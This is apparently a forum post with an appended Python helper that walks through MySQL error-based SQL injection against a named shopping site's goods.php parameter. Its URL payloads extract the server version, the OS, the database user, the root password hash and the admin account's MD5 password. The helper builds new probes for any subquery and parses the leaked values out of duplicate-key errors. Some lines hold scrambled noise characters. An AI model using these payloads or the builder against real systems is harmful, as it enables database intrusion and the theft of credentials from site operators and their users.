Blind injection details

Original poster, posted on 2012-9-5 14:59:30
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
user_name column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

" V* T6 [0 M: c; P* }当前 数据库 字段 password
- b- v8 ^. |* y6 s! P0 p; Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ [1 j7 U! x4 `

) Y( }) N, X+ D& Q% R3 V9 v' i3 u/ C( o# t8 ^( I
( E; Z& r6 f5 O) P. m  K
Obtain the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
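The payloads above all rely on the same MySQL trick: concat the value to leak with floor(rand()*2), GROUP BY that derived column, and let the duplicate-key error (ERROR 1062) carry the value back in its message. The following helper is an added example and is not part of the original post or of any tool it mentions; it decodes the post's char()-obfuscated, URL-encoded probes into readable SQL, builds the same error-based probe for an arbitrary subquery, and extracts the leaked value from the error text. The ERROR 1062 string is a constructed sample, and the sample URL fragment only reuses the shapes of the post's own URLs for illustration.

```python
"""Helpers for the floor(rand())/GROUP BY error-based injection technique.

Added example, not code from the original post. SAMPLE_ERROR is a constructed
MySQL ERROR 1062 message; SAMPLE_URL is a constructed fragment in the shape of
the post's goods.php URLs.
"""
import re
from urllib.parse import unquote

# MySQL char(115,97,...) literals, used in the post to avoid quote characters.
CHAR_RE = re.compile(r"char\(((?:\d+\s*,\s*)*\d+)\)", re.IGNORECASE)
# Shape of MySQL's duplicate-key error that the probe provokes.
DUP_RE = re.compile(r"Duplicate entry '(.*)' for key '[^']*'")

# Constructed sample inputs (not captured from any real target).
SAMPLE_ERROR = "ERROR 1062 (23000): Duplicate entry '5.5.27-log:1' for key 'group_key'"
SAMPLE_URL = (
    "wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from"
    "%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))"
    "%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23"
)


def decode_mysql_char(sql: str) -> str:
    """Replace char(n,n,...) literals with quoted strings so a payload reads
    as plain SQL, e.g. char(114,111,111,116) -> 'root'."""
    def repl(m: re.Match) -> str:
        text = "".join(chr(int(n)) for n in m.group(1).split(","))
        return "'" + text.replace("'", "''") + "'"
    return CHAR_RE.sub(repl, sql)


def readable_payload(url: str) -> str:
    """URL-decode an injected parameter and expand its char() literals."""
    return decode_mysql_char(unquote(url))


def build_payload(subquery: str, separator: str = "0x3a") -> str:
    """Build the error-based probe in the shape of the post's last section.

    The leaked value is concatenated with a separator and floor(rand(0)*2);
    grouping on that derived column makes the temporary-table insert hit a
    duplicate key, and MySQL echoes the key (our value) in the error.
    rand(0) is seeded, so the collision is deterministic once the FROM
    clause supplies at least three rows (information_schema.tables always
    does); the post's unseeded rand() over a two-row derived table only
    fires some of the time and may need repeating.
    """
    return (
        " and (select 1 from (select count(*),concat((%s),%s,floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)#" % (subquery, separator)
    )


def extract_leak(error_message: str):
    """Return the value smuggled out in an ERROR 1062 message, dropping the
    ':0' / ':1' suffix contributed by floor(rand(0)*2). Returns None when the
    message is not a duplicate-entry error (i.e. the probe did not fire)."""
    m = DUP_RE.search(error_message)
    if not m:
        return None
    value = m.group(1)
    return value.rsplit(":", 1)[0] if value[-2:] in (":0", ":1") else value


if __name__ == "__main__":
    print(readable_payload(SAMPLE_URL))
    print(build_payload("select @@version"))
    print(extract_leak(SAMPLE_ERROR))
```

Because rand() without a seed is re-evaluated on both the lookup and the insert into the GROUP BY temporary table, the unseeded form in the URL payloads is probabilistic; build_payload uses rand(0) over information_schema.tables, which is the deterministic variant the post's final "error-based injection" queries already use.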